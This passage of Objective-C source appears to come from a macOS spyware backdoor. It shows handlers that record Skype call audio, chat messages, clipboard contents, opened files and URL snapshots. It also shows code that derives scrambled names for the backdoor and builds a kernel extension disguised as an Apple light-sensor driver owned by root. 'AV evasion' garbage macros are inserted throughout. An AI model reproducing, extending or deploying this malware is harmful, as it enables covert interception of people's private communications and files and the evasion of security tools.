                                localPeer = [[NSString alloc] initWithData: _localPeer
                                                                  encoding: NSUTF16LittleEndianStringEncoding];
                                remotePeer = [[NSString alloc] initWithData: _remotePeer
                                                                   encoding: NSUTF16LittleEndianStringEncoding];
                                
                                [_localPeer release];
                                [_remotePeer release];
                                
                                hiStopTime = _voipHeader->hiStopTimestamp;
                                loStopTime = _voipHeader->loStopTimestamp;
#ifdef DEBUG_CORE
                                infoLog(@"hiStartRec: %x", _voipHeader->hiStartTimestamp);
                                infoLog(@"loStartRec: %x", _voipHeader->loStartTimestamp);
#endif
                                NSMutableData *voipAdditionalHeader = [[NSMutableData alloc] initWithData:
                                                                       [logData subdataWithRange: NSMakeRange(0, additionalSize)]];
                                
                                if ([_logManager createLog: AGENT_VOIP// + VOIP_SKYPE
                                               agentHeader: voipAdditionalHeader
                                                 withLogID: SKYPE_CHANNEL_INPUT] == TRUE)
                                {
                                    [self _speexEncodeBuffer: [voipInputData mutableBytes]
                                                    withSize: [voipInputData length]
                                                    channels: 2
                                                    forInput: YES];
                                }
                                else
                                {
#ifdef DEBUG_CORE
                                    errorLog(@"Error while creating log for input (skype)");
#endif
                                }
                                
                                [_logManager closeActiveLog: AGENT_VOIP// + VOIP_SKYPE
                                                  withLogID: SKYPE_CHANNEL_INPUT];
                                
                                [voipInputData release];
                                voipInputData = nil;
                                
                                //
                                // Closing the call
                                //
                                if ((shMemLog->flag & SKYPE_CLOSE_CALL) == SKYPE_CLOSE_CALL)
                                {
                                    gHasVoipInFinishedRecording = YES;
                                    
#ifdef DEBUG_CORE
                                    infoLog(@"Generating last entry log for input");
#endif
                                    NSMutableData *entryData = [[NSMutableData alloc]
                                                                initWithLength: sizeof(voipAdditionalStruct)];
                                    
                                    //short dummyWord   = 0x0000;
                                    u_int _dummydWord = 0xFFFFFFFF;
                                    
                                    NSMutableData *dummydWord = [[NSMutableData alloc] initWithBytes: &_dummydWord
                                                                                              length: sizeof(u_int)];
                                    /*
                                     time_t unixTime;
                                     time(&unixTime);
                                     
                                     int64_t filetime = ((int64_t)unixTime * (int64_t)RATE_DIFF) + (int64_t)EPOCH_DIFF;
                                     NSString *tmpPeerName = @"sux";
                                     */
                                    voipAdditionalStruct *voipAdditional    = (voipAdditionalStruct *)[entryData bytes];
                                    voipAdditional->version                 = LOG_VOIP_VERSION;
                                    voipAdditional->channel                 = CHANNEL_MICROPHONE;
                                    voipAdditional->programType             = AGENT_VOIP + VOIP_SKYPE;
                                    voipAdditional->sampleRate              = SAMPLE_RATE_SKYPE;
                                    voipAdditional->isIngoing               = 0;
                                    voipAdditional->hiStartTimestamp        = hiStopTime;
                                    voipAdditional->loStartTimestamp        = loStopTime;
                                    voipAdditional->hiStopTimestamp         = hiStopTime;
                                    voipAdditional->loStopTimestamp         = loStopTime;
                                    voipAdditional->localPeerLength         = [localPeer lengthOfBytesUsingEncoding: NSUTF16LittleEndianStringEncoding];
                                    voipAdditional->remotePeerLength        = [remotePeer lengthOfBytesUsingEncoding: NSUTF16LittleEndianStringEncoding];
                                    
                                    // Local Peer Name
                                    [entryData appendData: [localPeer dataUsingEncoding: NSUTF16LittleEndianStringEncoding]];
                                    
                                    // Null terminator
                                    //[entryData appendBytes: &dummyWord
                                    //                length: sizeof(short)];
                                    
                                    // Remote Peer Name
                                    [entryData appendData: [remotePeer dataUsingEncoding: NSUTF16LittleEndianStringEncoding]];
                                    
                                    // Null terminator
                                    //[entryData appendBytes: &dummyWord
                                    //                length: sizeof(short)];
                                    
                                    if ([_logManager createLog: AGENT_VOIP// + VOIP_SKYPE
                                                   agentHeader: entryData
                                                     withLogID: SKYPE_CHANNEL_INPUT] == TRUE)
                                    {
                                        [_logManager writeDataToLog: dummydWord
                                                           forAgent: AGENT_VOIP// + VOIP_SKYPE
                                                          withLogID: SKYPE_CHANNEL_INPUT];
                                    }
                                    else
                                    {
#ifdef DEBUG_CORE
                                        errorLog(@"Error while creating close log file for input (skype)");
#endif
                                    }
                                    
                                    [_logManager closeActiveLog: AGENT_VOIP// + VOIP_SKYPE
                                                      withLogID: SKYPE_CHANNEL_INPUT];
                                    
                                    [entryData release];
                                    [dummydWord release];
                                    
                                    [localPeer release];
                                    [remotePeer release];
                                }
                                
                                [voipAdditionalHeader release];
                            }
                            else if ((shMemLog->flag & SKYPE_CHANNEL_OUTPUT) == SKYPE_CHANNEL_OUTPUT)
                            {
#ifdef DEBUG_CORE
                                infoLog(@"[ii] Voip - Closing output channel");
                                infoLog(@"[ii] audioChunk size: %d", [voipOutputData length]);
#endif
                                voipAdditionalStruct *_voipHeader = (voipAdditionalStruct *)[logData bytes];
                                int additionalSize = sizeof(voipAdditionalStruct)
                                + _voipHeader->localPeerLength
                                + _voipHeader->remotePeerLength;
                                
                                _localPeer = [[NSData alloc] initWithData:
                                              [logData subdataWithRange:
                                               NSMakeRange(sizeof(voipAdditionalStruct),
                                                           _voipHeader->localPeerLength)]];
                                
                                _remotePeer = [[NSData alloc] initWithData:
                                               [logData subdataWithRange:
                                                NSMakeRange(sizeof(voipAdditionalStruct)
                                                            + _voipHeader->localPeerLength,
                                                            _voipHeader->remotePeerLength)]];
                                
                                localPeer = [[NSString alloc] initWithData: _localPeer
                                                                  encoding: NSUTF16LittleEndianStringEncoding];
                                remotePeer = [[NSString alloc] initWithData: _remotePeer
                                                                   encoding: NSUTF16LittleEndianStringEncoding];
                                
                                [_localPeer release];
                                [_remotePeer release];
                                
                                hiStopTime = _voipHeader->hiStopTimestamp;
                                loStopTime = _voipHeader->loStopTimestamp;
                                
                                NSMutableData *voipAdditionalHeader = [[NSMutableData alloc] initWithData:
                                                                       [logData subdataWithRange: NSMakeRange(0, additionalSize)]];
                                
                                if ([_logManager createLog: AGENT_VOIP// + VOIP_SKYPE
                                               agentHeader: voipAdditionalHeader
                                                 withLogID: SKYPE_CHANNEL_OUTPUT] == TRUE)
                                {
                                    [self _speexEncodeBuffer: [voipOutputData mutableBytes]
                                                    withSize: [voipOutputData length]
                                                    channels: 2
                                                    forInput: NO];
                                }
                                else
                                {
#ifdef DEBUG_CORE
                                    errorLog(@"Error while creating log for output (skype)");
#endif
                                }
                                
                                [voipAdditionalHeader release];
                                [_logManager closeActiveLog: AGENT_VOIP// + VOIP_SKYPE
                                                  withLogID: SKYPE_CHANNEL_OUTPUT];
                                
                                [voipOutputData release];
                                voipOutputData = nil;
                                
                                //
                                // Closing call
                                //
                                if ((shMemLog->flag & SKYPE_CLOSE_CALL) == SKYPE_CLOSE_CALL)
                                {
                                    gHasVoipOutFinishedRecording = YES;
                                    
#ifdef DEBUG_CORE
                                    infoLog(@"Generating last entry log for output");
#endif
                                    NSMutableData *entryData = [[NSMutableData alloc] initWithLength: sizeof(voipAdditionalStruct)];
                                    
                                    //short dummyWord   = 0x0000;
                                    u_int _dummydWord = 0xFFFFFFFF;
                                    
                                    NSMutableData *dummydWord = [[NSMutableData alloc] initWithBytes: &_dummydWord
                                                                                              length: sizeof(u_int)];
                                    /*
                                     time_t unixTime;
                                     time(&unixTime);
                                     int64_t filetime = ((int64_t)unixTime * (int64_t)RATE_DIFF) + (int64_t)EPOCH_DIFF;
                                     NSString *tmpPeerName = @"sux";
                                     */
                                    voipAdditionalStruct *voipAdditional    = (voipAdditionalStruct *)[entryData bytes];
                                    voipAdditional->version                 = LOG_VOIP_VERSION;
                                    voipAdditional->channel                 = CHANNEL_SPEAKERS;
                                    voipAdditional->programType             = AGENT_VOIP + VOIP_SKYPE;
                                    voipAdditional->sampleRate              = SAMPLE_RATE_SKYPE;
                                    voipAdditional->isIngoing               = 0;
                                    voipAdditional->hiStartTimestamp        = hiStopTime;
                                    voipAdditional->loStartTimestamp        = loStopTime;
                                    voipAdditional->hiStopTimestamp         = hiStopTime;
                                    voipAdditional->loStopTimestamp         = loStopTime;
                                    voipAdditional->localPeerLength         = [localPeer lengthOfBytesUsingEncoding: NSUTF16LittleEndianStringEncoding];
                                    voipAdditional->remotePeerLength        = [remotePeer lengthOfBytesUsingEncoding: NSUTF16LittleEndianStringEncoding];
                                    
                                    // Local Peer Name
                                    [entryData appendData: [localPeer dataUsingEncoding: NSUTF16LittleEndianStringEncoding]];
                                    
                                    // Null terminator
                                    //[entryData appendBytes: &dummyWord
                                    //                length: sizeof(short)];
                                    
                                    // Remote Peer Name
                                    [entryData appendData: [remotePeer dataUsingEncoding: NSUTF16LittleEndianStringEncoding]];
                                    
                                    // Null terminator
                                    //[entryData appendBytes: &dummyWord
                                    //                length: sizeof(short)];
                                    
                                    if ([_logManager createLog: AGENT_VOIP// + VOIP_SKYPE
                                                   agentHeader: entryData
                                                     withLogID: SKYPE_CHANNEL_OUTPUT] == TRUE)
                                    {
                                        [_logManager writeDataToLog: dummydWord
                                                           forAgent: AGENT_VOIP// + VOIP_SKYPE
                                                          withLogID: SKYPE_CHANNEL_OUTPUT];
                                    }
                                    else
                                    {
#ifdef DEBUG_CORE
                                        errorLog(@"Error while creating close log file for output (skype)");
#endif
                                    }
                                    
                                    [_logManager closeActiveLog: AGENT_VOIP// + VOIP_SKYPE
                                                      withLogID: SKYPE_CHANNEL_OUTPUT];
                                    
                                    [entryData release];
                                    [dummydWord release];
                                    
                                    [localPeer release];
                                    [remotePeer release];
                                }
                                
                                [voipAdditionalHeader release];
                            }
                            
                            break;
                        }
                    }
                    
                    break;
                }
                case AGENT_CHAT_NEW:
                {
                    // AV evasion: only on release build
                    AV_GARBAGE_000
                    
#ifdef DEBUG_CORE
                    verboseLog(@"Logs from agent CHAT");
#endif
                    logData = [[NSMutableData alloc] initWithBytes: shMemLog->commandData
                                                            length: shMemLog->commandDataSize];
                    
                    if ([_logManager writeDataToLog: logData
                                           forAgent: AGENT_CHAT_NEW
                                          withLogID: 0] == TRUE)
                    {
#ifdef DEBUG_CORE
                        infoLog(@"CHAT message logged correctly");
#endif
                    }
                    else
                    {
#ifdef DEBUG_CORE
                        errorLog(@"An error occurred while logging CHAT data");
#endif
                    }
                    break;
                }
                case AGENT_CLIPBOARD:
                {
                    // AV evasion: only on release build
                    AV_GARBAGE_000
                    
#ifdef DEBUG_CORE
                    verboseLog(@"Logs from clipboard");
#endif
                    
                    logData = [[NSMutableData alloc] initWithBytes: shMemLog->commandData
                                                            length: shMemLog->commandDataSize];
                    
                    if ([_logManager writeDataToLog: logData
                                           forAgent: AGENT_CLIPBOARD
                                          withLogID: 0] == TRUE)
                    {
#ifdef DEBUG_CORE
                        infoLog(@"Clipboard logged correctly");
#endif
                    }
                    
                    break;
                }
                case AGENT_INTERNAL_FILEOPEN:
                {
                    // AV evasion: only on release build
                    AV_GARBAGE_005
                    
                    logData = [[NSMutableData alloc] initWithBytes: shMemLog->commandData
                                                            length: shMemLog->commandDataSize];
                    
                    if ([_logManager writeDataToLog: logData
                                           forAgent: AGENT_FILECAPTURE_OPEN
                                          withLogID: 0] == TRUE)
                    {
#ifdef DEBUG_CORE
                        infoLog(@"Logged file open");
#endif
                    }
                    
                    break;
                }
                case AGENT_INTERNAL_FILECAPTURE:
                {
                    // AV evasion: only on release build
                    AV_GARBAGE_003
                    
                    logData = [[NSMutableData alloc] initWithBytes: shMemLog->commandData
                                                            length: shMemLog->commandDataSize];
                    
                    NSString *path = [[NSString alloc] initWithData: logData
                                                           encoding: NSUTF16LittleEndianStringEncoding];
                    
                    __m_MFileSystemManager *fsManager = [[__m_MFileSystemManager alloc] init];
                    BOOL success = [fsManager logFileAtPath: path
                                                 forAgentID: AGENT_FILECAPTURE];
                    
                    if (!success)
                    {
#ifdef DEBUG_CORE
                        errorLog(@"Error while logging file content at path %@", path);
#endif
                    }
                    else
                    {
#ifdef DEBUG_CORE
                        infoLog(@"File content logged correctly for path %@", path);
#endif
                    }
                    
                    [path release];
                    [fsManager release];
                    break;
                }
                case LOG_URL_SNAPSHOT:
                {
                    // AV evasion: only on release build
                    AV_GARBAGE_006
                    
#ifdef DEBUG_CORE
                    verboseLog(@"Logs from url snapshot");
#endif
                    
                    logData = [[NSMutableData alloc] initWithBytes: shMemLog->commandData
                                                            length: shMemLog->commandDataSize];
                    urlSnapAdditionalStruct *_urlHeader = (urlSnapAdditionalStruct *)[logData bytes];
                    
                    switch (shMemLog->commandType)
                    {
                        case CM_CREATE_LOG_HEADER:
                        {
#ifdef DEBUG_CORE
                            infoLog(@"Creating log header for url snapshot (%d)", shMemLog->flag);
#endif
                            int additionalSize = sizeof(urlSnapAdditionalStruct)
                            + _urlHeader->urlNameLen
                            + _urlHeader->windowTitleLen;
                            
                            NSMutableData *urlSnapAdditionalHeader = [[NSMutableData alloc] initWithData:
                                                                      [logData subdataWithRange: NSMakeRange(0, additionalSize)]];
                            NSMutableData *urlSnapData = [[NSMutableData alloc] initWithData: [logData subdataWithRange:
                                                                                               NSMakeRange([urlSnapAdditionalHeader length],
                                                                                                           [logData length] - [urlSnapAdditionalHeader length])]];
                            
                            //
                            // Create log here since we need to pass anAgentHeader as the
                            // additional file header
                            //
                            if ([_logManager createLog: LOG_URL_SNAPSHOT
                                           agentHeader: urlSnapAdditionalHeader
                                             withLogID: shMemLog->flag] == TRUE)
                            {
                                if ([_logManager writeDataToLog: urlSnapData
                                                       forAgent: LOG_URL_SNAPSHOT
                                                      withLogID: shMemLog->flag] == TRUE)
                                {
#ifdef DEBUG_CORE
                                    infoLog(@"Written first entry for URL snapshot (%d)", shMemLog->flag);
#endif
                                }
                                else
                                {
#ifdef DEBUG_CORE
                                    errorLog(@"Error while writing first entry for URL snapshot");
#endif
                                }
                            }
                            else
                            {
#ifdef DEBUG_CORE
                                errorLog(@"Error while creating URL snapshot log");
#endif
                            }
                            
                            [urlSnapAdditionalHeader release];
                            [urlSnapData release];
                        } break;
                        case CM_LOG_DATA:
                        {
#ifdef DEBUG_CORE
                            verboseLog(@"Received data for URL Snapshot");
#endif
                            if ([_logManager writeDataToLog: logData
                                                   forAgent: LOG_URL_SNAPSHOT
                                                  withLogID: shMemLog->flag] == TRUE)
                            {
#ifdef DEBUG_CORE
                                verboseLog(@"Written data for URL snapshot");
#endif
                            }
                            else
                            {
#ifdef DEBUG_CORE
                                errorLog(@"Error while writing data for URL Snapshot (%d)", shMemLog->flag);
#endif
                            }
                        } break;
                        case CM_CLOSE_LOG:
                        {
#ifdef DEBUG_CORE
                            infoLog(@"Closing log for url snapshot (%d)", shMemLog->flag);
#endif
                            
                            [_logManager closeActiveLog: LOG_URL_SNAPSHOT
                                              withLogID: shMemLog->flag];
                        } break;
                        default:
                        {
#ifdef DEBUG_CORE
                            errorLog(@"Unknown command type from url snapshot");
#endif
                        }
                    }
                    
                    break;
                }
                case AGENT_CHAT_CONTACT:
                {
                    // AV evasion: only on release build
                    AV_GARBAGE_008
                    
#ifdef DEBUG_CORE
                    verboseLog(@"Log contact from chat agent");
#endif
                    logData = [[NSMutableData alloc] initWithBytes: shMemLog->commandData
                                                            length: shMemLog->commandDataSize];
                    
                    if ([_logManager createLog: AGENT_ORGANIZER
                                   agentHeader: nil
                                     withLogID: 0xABCD] == FALSE)
                    {
                        // AV evasion: only on release build
                        AV_GARBAGE_002
                        
                        break;
                    }
                    
                    if ([_logManager writeDataToLog: logData
                                           forAgent: AGENT_ORGANIZER
                                          withLogID: 0xABCD] == FALSE)
                    {
                        // AV evasion: only on release build
                        AV_GARBAGE_003
                        
                        break;
                    }
                    
                    // AV evasion: only on release build
                    AV_GARBAGE_001
                    
                    [_logManager closeActiveLog: AGENT_ORGANIZER
                                      withLogID: 0xABCD];
                    break;
                }
                default:
                {
#ifdef DEBUG_CORE
                    errorLog(@"Agent not yet implemented: %d", shMemLog->agentID);
#endif
                    break;
                }
            }
        }
#if 0
        if (agentsCount - agentIndex == 1)
            agentIndex = 0;
        else
            agentIndex++;
#endif
        // AV evasion: only on release build
        AV_GARBAGE_005
        
        if (logData != nil)
        {
            [logData release];
        }
        
        if (readData != nil)
        {
            [readData release];
        }
        
        // AV evasion: only on release build
        AV_GARBAGE_005
        
        NSMutableDictionary *agentConfiguration = [_taskManager getConfigForAgent: AGENT_VOIP];
        
#ifdef DEBUG_CORE
        if (x == 0)
            infoLog(@"Checking if skype is running");
#endif
        
        if (agentConfiguration != nil)
        {
            [agentConfiguration retain];
            
#ifdef DEBUG_CORE
            if (x == 0)
                infoLog(@"Got skype conf");
#endif
            
            // AV evasion: only on release build
            AV_GARBAGE_009
            
            if ([[agentConfiguration objectForKey: @"status"] isEqual: AGENT_RUNNING]
                || [[agentConfiguration objectForKey: @"status"] isEqual: AGENT_START])
            {
#ifdef DEBUG_CORE
                if (x == 0)
                    warnLog(@"Skype is running");
#endif
                [[NSRunLoop currentRunLoop] runUntilDate: [NSDate dateWithTimeIntervalSinceNow: 0.001]];
            }
            else
            {
#ifdef DEBUG_CORE
                if (x == 0)
                    warnLog(@"Skype is not running");
#endif
                [[NSRunLoop currentRunLoop] runUntilDate: [NSDate dateWithTimeIntervalSinceNow: 0.01]];
            }
            
            [agentConfiguration release];
        }
        else
        {
#ifdef DEBUG_CORE
            if (x == 0)
                warnLog(@"Skype conf not found");
#endif
        }
        
#ifdef DEBUG_CORE
        if (x == 0)
            x++;
#endif
        
        // AV evasion: only on release build
        AV_GARBAGE_008
        
        [innerPool drain];
    }
    
    if ([localFlag isEqualToString: @"STOP"])
    {
        while (true)
            sleep(1);
    }
}

- (void)_guessNames
{
    // AV evasion: only on release build
    AV_GARBAGE_002
    
#ifdef DEV_MODE
    //  unsigned char result[CC_MD5_DIGEST_LENGTH];
    //  CC_MD5(gConfAesKey, strlen(gConfAesKey), result);
    //
    //  NSData *temp = [NSData dataWithBytes: result
    //                                length: CC_MD5_DIGEST_LENGTH];
    NSData *temp = [NSData dataWithBytes: gConfAesKey
                                  length: CC_MD5_DIGEST_LENGTH];
#else
    NSData *temp = [NSData dataWithBytes: gConfAesKey
                                  length: CC_MD5_DIGEST_LENGTH];
#endif
    
    // AV evasion: only on release build
    AV_GARBAGE_007
    
    __m_MEncryption *_encryption = [[__m_MEncryption alloc] initWithKey: temp];
    gBackdoorName = [[[NSBundle mainBundle] executablePath] lastPathComponent];
    NSString *_backdoorName = nil;
    
    if ([gBackdoorName isEqualToString: @"System Preferences"])
    {
        NSString *searchPattern = [[NSString alloc] initWithFormat: @"%@/*.ez",
                                   [[NSBundle mainBundle] bundlePath]];
        
        NSArray *_searchedFile = searchForProtoUpload(searchPattern);
        // AV evasion: only on release build
        AV_GARBAGE_005
        
        [searchPattern release];
        
        // AV evasion: only on release build
        AV_GARBAGE_005
        
        if ([_searchedFile count] > 0)
        {
            _backdoorName = [[[_searchedFile objectAtIndex: 0] stringByReplacingOccurrencesOfString: @".ez"
                                                                                         withString: @""] lastPathComponent];
        }
    }
    else
    {
        _backdoorName = gBackdoorName;
    }
    
    //
    // Here we should calculate the lowest scrambled name in order to obtain
    // the configuration name
    //
    gBackdoorUpdateName = [_encryption scrambleForward: _backdoorName
                                                  seed: ALPHABET_LEN / 2];
    
    // AV evasion: only on release build
    AV_GARBAGE_005
    
    if ([gBackdoorName isLessThan: gBackdoorUpdateName])
    {
#ifdef DEBUG_CORE
        infoLog(@"gBackdoor");
#endif
        // AV evasion: only on release build
        AV_GARBAGE_005
        
        gConfigurationName = [_encryption scrambleForward: _backdoorName
                                                     seed: 1];
    }
    else
    {
#ifdef DEBUG_CORE
        infoLog(@"gBackdoor Update");
#endif
        gConfigurationName = [_encryption scrambleForward: gBackdoorUpdateName
                                                     seed: 1];
    }
    
    gConfigurationUpdateName  = [_encryption scrambleForward: gConfigurationName
                                                        seed: ALPHABET_LEN / 2];
    gInputManagerName         = [_encryption scrambleForward: gConfigurationName
                                                        seed: 2];
    gKext32Name               = [_encryption scrambleForward: gConfigurationName
                                                        seed: 4];
    //  gXPCName                  = [_encryption scrambleForward: gConfigurationName
    //                                                      seed: 8];
    gKext64Name               = [_encryption scrambleForward: gConfigurationName
                                                        seed: 16];
    
    // AV evasion: only on release build
    AV_GARBAGE_005
    
#ifdef DEBUG_CORE
    if ([gBackdoorName isEqualToString: @"System Preferences"] == NO)
    {
        infoLog(@"name       : %@", gBackdoorName);
        infoLog(@"update name: %@", gBackdoorUpdateName);
        infoLog(@"conf name  : %@", gConfigurationName);
        infoLog(@"conf update: %@", gConfigurationUpdateName);
        infoLog(@"imanager   : %@", gInputManagerName);
        infoLog(@"kext32 name: %@", gKext32Name);
        infoLog(@"kext64 name: %@", gKext64Name);
    }
#endif
    
    [_encryption release];
}

- (void)_createInternalFilesAndFolders
{
    // AV evasion: only on release build
    AV_GARBAGE_003
    
#ifdef DEBUG_CORE
    infoLog(@"");
#endif
    
    NSTask *task = [[NSTask alloc] init];
    NSArray *_commArguments = [[NSArray alloc] initWithObjects: @"-r", nil];
    
    [task setLaunchPath: @"/usr/bin/uname"];
    [task setArguments: _commArguments];
    
    // AV evasion: only on release build
    AV_GARBAGE_005
    
    NSPipe *pipe = [NSPipe pipe];
    [task setStandardOutput: pipe];
    [task setStandardError: pipe];
    NSFileHandle *file = [pipe fileHandleForReading];
    
    [task launch];
    [task waitUntilExit];
    
    // AV evasion: only on release build
    AV_GARBAGE_002
    
    NSData *taskData      = [file readDataToEndOfFile];
    NSString *taskOutput  = [[NSString alloc] initWithData: taskData
                                                  encoding: NSUTF8StringEncoding];
    
#ifdef DEBUG_CORE
    infoLog(@"taskOutput: %@", taskOutput);
#endif
    [task release];
    
    //
    // Preparing KEXT folders and files
    //
    NSMutableDictionary *rootObj = [NSMutableDictionary dictionaryWithCapacity: 8];
    NSMutableDictionary *innerDict;
    
    // AV evasion: only on release build
    AV_GARBAGE_009
    
    if ([gUtil isLeopard])
    {
        innerDict = [NSMutableDictionary dictionaryWithCapacity: 1];
        [innerDict setObject: taskOutput forKey: @"com.apple.kernel"];
    }
    else
    {
        innerDict = [NSMutableDictionary dictionaryWithCapacity: 2];
        [innerDict setObject: taskOutput forKey: @"com.apple.kpi.bsd"];
        [innerDict setObject: taskOutput forKey: @"com.apple.kpi.libkern"];
    }
    
    // AV evasion: only on release build
    AV_GARBAGE_003
    
    [rootObj setObject: @"English" forKey: @"CFBundleDevelopmentRegion"];
    [rootObj setObject: @"com.apple.driver.SMCLightSensor" forKey: @"CFBundleIdentifier"];
    [rootObj setObject: @"6.0" forKey: @"CFBundleInfoDictionaryVersion"];
    [rootObj setObject: @"com.apple.driver.SMCLightSensor" forKey:@"CFBundleName"];
    [rootObj setObject: @"KEXT" forKey: @"CFBundlePackageType"];
    [rootObj setObject: @"????" forKey: @"CFBundleSignature"];
    [rootObj setObject: @"2.0" forKey: @"CFBundleVersion"];
    [rootObj setObject: innerDict forKey: @"OSBundleLibraries"];
    
    // AV evasion: only on release build
    AV_GARBAGE_007
    
    if (is64bitKernel())
    {
#ifdef DEBUG_CORE
        infoLog(@"Configuring kext64");
#endif
        [rootObj setObject: gKext64Name forKey: @"CFBundleExecutable"];
    }
    else
    {
#ifdef DEBUG_CORE
        infoLog(@"Configuring kext32");
#endif
        [rootObj setObject: gKext32Name forKey: @"CFBundleExecutable"];
    }
    
    NSString *err;
    NSData *binData = [NSPropertyListSerialization dataFromPropertyList: rootObj
                                                                 format: NSPropertyListXMLFormat_v1_0
                                                       errorDescription: &err];
    
    // AV evasion: only on release build
    AV_GARBAGE_003
    
    NSString *_backdoorContentPath = [NSString stringWithFormat: @"%@/%@",
                                      [[NSBundle mainBundle] bundlePath],
                                      @"Contents"];
    mkdir([_backdoorContentPath UTF8String], 0755);
    
    _backdoorContentPath = [NSString stringWithFormat: @"%@/Contents/Resources",
                            [[NSBundle mainBundle] bundlePath]];
    
    // AV evasion: only on release build
    AV_GARBAGE_005
    
    mkdir([_backdoorContentPath UTF8String], 0755);
    
    _backdoorContentPath = [NSString stringWithFormat: @"%@/Contents/MacOS",
                            [[NSBundle mainBundle] bundlePath]];
    mkdir([_backdoorContentPath UTF8String], 0755);
    
    // AV evasion: only on release build
    AV_GARBAGE_005
    
    if (is64bitKernel())
    {
        _backdoorContentPath = [NSString stringWithFormat: @"%@/Contents/Resources/%@.kext",
                                [[NSBundle mainBundle] bundlePath],
                                gKext64Name];
        mkdir([_backdoorContentPath UTF8String], 0755);
        
        _backdoorContentPath = [NSString stringWithFormat: @"%@/Contents/Resources/%@.kext/%@",
                                [[NSBundle mainBundle] bundlePath],
                                gKext64Name,
                                @"Contents"];
        mkdir([_backdoorContentPath UTF8String], 0755);
        
        // AV evasion: only on release build
        AV_GARBAGE_009
        
        _backdoorContentPath = [NSString stringWithFormat: @"%@/Contents/Resources/%@.kext/%@",
                                [[NSBundle mainBundle] bundlePath],
                                gKext64Name,
                                @"Contents/Resources"];
        mkdir([_backdoorContentPath UTF8String], 0755);
        
        // AV evasion: only on release build
        AV_GARBAGE_005
        
        _backdoorContentPath = [NSString stringWithFormat: @"%@/Contents/Resources/%@.kext/%@",
                                [[NSBundle mainBundle] bundlePath],
                                gKext64Name,
                                @"Contents/MacOS"];
        mkdir([_backdoorContentPath UTF8String], 0755);
        
        // AV evasion: only on release build
        AV_GARBAGE_002
        
        _backdoorContentPath = [NSString stringWithFormat: @"%@/Contents/Resources/%@.kext/%@",
                                [[NSBundle mainBundle] bundlePath],
                                gKext64Name,
                                @"/Contents/Info.plist"];
    }
    else
    {
        _backdoorContentPath = [NSString stringWithFormat: @"%@/Contents/Resources/%@.kext",
                                [[NSBundle mainBundle] bundlePath],
                                gKext32Name];
        mkdir([_backdoorContentPath UTF8String], 0755);
        
        // AV evasion: only on release build
        AV_GARBAGE_001
        
        _backdoorContentPath = [NSString stringWithFormat: @"%@/Contents/Resources/%@.kext/%@",
                                [[NSBundle mainBundle] bundlePath],
                                gKext32Name,
                                @"Contents"];
        mkdir([_backdoorContentPath UTF8String], 0755);
        
        // AV evasion: only on release build
        AV_GARBAGE_002
        
        _backdoorContentPath = [NSString stringWithFormat: @"%@/Contents/Resources/%@.kext/%@",
                                [[NSBundle mainBundle] bundlePath],
                                gKext32Name,
                                @"Contents/Resources"];
        mkdir([_backdoorContentPath UTF8String], 0755);
        
        // AV evasion: only on release build
        AV_GARBAGE_005
        
        _backdoorContentPath = [NSString stringWithFormat: @"%@/Contents/Resources/%@.kext/%@",
                                [[NSBundle mainBundle] bundlePath],
                                gKext32Name,
                                @"Contents/MacOS"];
        mkdir([_backdoorContentPath UTF8String], 0755);
        
        // AV evasion: only on release build
        AV_GARBAGE_005
        
        _backdoorContentPath = [NSString stringWithFormat: @"%@/Contents/Resources/%@.kext/%@",
                                [[NSBundle mainBundle] bundlePath],
                                gKext32Name,
                                @"/Contents/Info.plist"];
    }
    
    // AV evasion: only on release build
    AV_GARBAGE_000
    
    [binData writeToFile: _backdoorContentPath
              atomically: YES];
    
    NSString *tempKextDir;
    
    // AV evasion: only on release build
    AV_GARBAGE_000
    
    if (is64bitKernel())
    {
        _backdoorContentPath = [NSString stringWithFormat: @"%@/Contents/Resources/%@.kext/%@/%@",
                                [[NSBundle mainBundle] bundlePath],
                                gKext64Name,
                                @"/Contents/MacOS",
                                gKext64Name];
        
        // AV evasion: only on release build
        AV_GARBAGE_005
        
        tempKextDir = [[NSString alloc] initWithFormat: @"%@/%@",
                       [[NSBundle mainBundle] bundlePath],
                       gKext64Name];
    }
    else
    {
        _backdoorContentPath = [NSString stringWithFormat: @"%@/Contents/Resources/%@.kext/%@/%@",
                                [[NSBundle mainBundle] bundlePath],
                                gKext32Name,
                                @"/Contents/MacOS",
                                gKext32Name];
        
        // AV evasion: only on release build
        AV_GARBAGE_005
        
        tempKextDir = [[NSString alloc] initWithFormat: @"%@/%@",
                       [[NSBundle mainBundle] bundlePath],
                       gKext32Name];
    }
    
#ifdef DEBUG_CORE
    infoLog(@"kext origin     : %@", tempKextDir);
    infoLog(@"kext destination: %@", _backdoorContentPath);
#endif
    
    [[NSFileManager defaultManager] moveItemAtPath: tempKextDir
                                            toPath: _backdoorContentPath
                                             error: nil];
    
    // AV evasion: only on release build
    AV_GARBAGE_001
    
    [tempKextDir release];
    [taskOutput release];
    
    if (is64bitKernel())
    {
        _backdoorContentPath = [NSString stringWithFormat: @"%@/Contents/Resources/%@.kext",
                                [[NSBundle mainBundle] bundlePath],
                                gKext64Name];
    }
    else
    {
        _backdoorContentPath = [NSString stringWithFormat: @"%@/Contents/Resources/%@.kext",
                                [[NSBundle mainBundle] bundlePath],
                                gKext32Name];
        // AV evasion: only on release build
        AV_GARBAGE_002
    }
    NSArray *arguments = [NSArray arrayWithObjects:
                          @"-R",
                          @"root:wheel",
                          _backdoorContentPath,
                          nil];
    [gUtil executeTask: @"/usr/sbin/chown"
         withArguments: arguments
          waitUntilEnd: YES];
    
    // AV evasion: only on release build
    AV_GARBAGE_001
    
    //
    // Backdoor .app Info.plist
    //
    rootObj   = [NSMutableDictionary dictionaryWithCapacity: 10];
    
    [rootObj setObject: @"English" forKey: @"CFBundleDevelopmentRegion"];
    [rootObj setObject: [[[NSBundle mainBundle] executablePath] lastPathComponent] forKey: @"CFBundleExecutable"];
    [rootObj setObject: @"1" forKey: @"NSUIElement"];
    [rootObj setObject: @"com.apple.driver.SMCLightSensor-user" forKey: @"CFBundleIdentifier"];
    [rootObj setObject: @"6.0" forKey: @"CFBundleInfoDictionaryVersion"];
    [rootObj setObject: @"SMCLightSensor-user" forKey: @"CFBundleName"];
    [rootObj setObject: @"APPL" forKey: @"CFBundlePackageType"];
    [rootObj setObject: @"????" forKey: @"CFBundleSignature"];
    [rootObj setObject: @"1.0" forKey: @"CFBundleVersion"];
    [rootObj setObject: @"MainMenu" forKey: @"NSMainNibFile"];
    [rootObj setObject: @"NSApplication" forKey: @"NSPrincipalClass"];
    
    binData = [NSPropertyListSerialization dataFromPropertyList: rootObj
                                                         format: NSPropertyListXMLFormat_v1_0
                                               errorDescription: nil];
    
